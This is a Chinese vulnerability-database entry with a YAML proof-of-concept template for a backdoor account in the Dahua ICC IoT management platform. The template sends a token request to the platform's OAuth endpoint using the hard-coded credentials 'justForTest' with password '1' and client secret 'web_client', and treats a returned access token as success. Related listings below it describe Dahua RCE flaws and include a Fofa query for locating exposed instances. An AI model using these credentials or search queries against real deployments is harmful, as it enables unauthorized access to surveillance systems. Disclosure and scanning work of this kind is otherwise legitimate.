dahua-icc-backdoor-user: 大华 ICC 智能物联综合管理平台后门用户

漏洞描述

PoC代码[已公开]

id: dahua-icc-backdoor-user

info:
  name: 大华 ICC 智能物联综合管理平台后门用户
  author: Observer
  severity: high
  verified: true
  description: |
    大华 ICC 智能物联综合管理平台后门用户
  tags: icc,backdoor
  created: 2023/12/08

rules:
  r0:
    request:
      method: POST
      path: /evo-apigw/evo-oauth/oauth/token
      body: username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"success":') && 
      response.body.bcontains(b'"access_token":') && 
      response.body.bcontains(b'"token_type":')
expression: r0()

相关漏洞推荐

• dahua-icc-getclassvalue-rce: 大华 ICC 智能物联综合管理平台 GetClassValue RCE POC

  2025-09-01 | 大华ICC智能物联综合管理平台
  大华智能物联综合管理平台GetClassValue.jsp存在远程代码执行漏洞，攻击者可获取服务器权限 Fofa: app="dahua-智能物联综合管理平台"

• 大华ICC智能物联综合管理平台env敏感信息泄露 无POC

  2024-06-17 | 大华ICC智能物联综合管理平台
  大华-智能物联综合管理平台是由浙江大华技术股份有限公司推出的一款综合性管理平台，该平台基于物联网技术，旨在为企业和用户提供智能化、便捷化的物联网解决方案。大华-智能物联综合管理平台存在env敏感信息泄...

• dahua-icc-sysusers-random-fastjson-rce: 大华ICC智能物联综合管理平台存在fastjson漏洞 POC

  2025-09-01 | dahua-icc
  大华ICC智能物联综合管理平台是专门为大华股份研发的一款物联网管理平台，它可以对多个智能设备和系统进行统一管理和控制，方便用户实时了解和管理各个设备和系统的状态。该平台提供了一系列的智能化功能，包括设...

• SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

  2025-09-22 00:22:31 | SourceCodester Pet Grooming Management Software
  SourceCodester Pet Grooming Management Software是SourceCodester开源的一个宠物美容管理系统。 SourceCodester Pet Groo...

• D-Link DIR-645 命令注入漏洞 无POC

  2025-09-22 00:22:31 | D-Link DIR-645
  D-Link DIR-645是中国友讯（D-Link）公司的一款无线路由器。 D-Link DIR-645 105B01版本存在命令注入漏洞，该漏洞源于对文件/soap.cgi中参数service的错...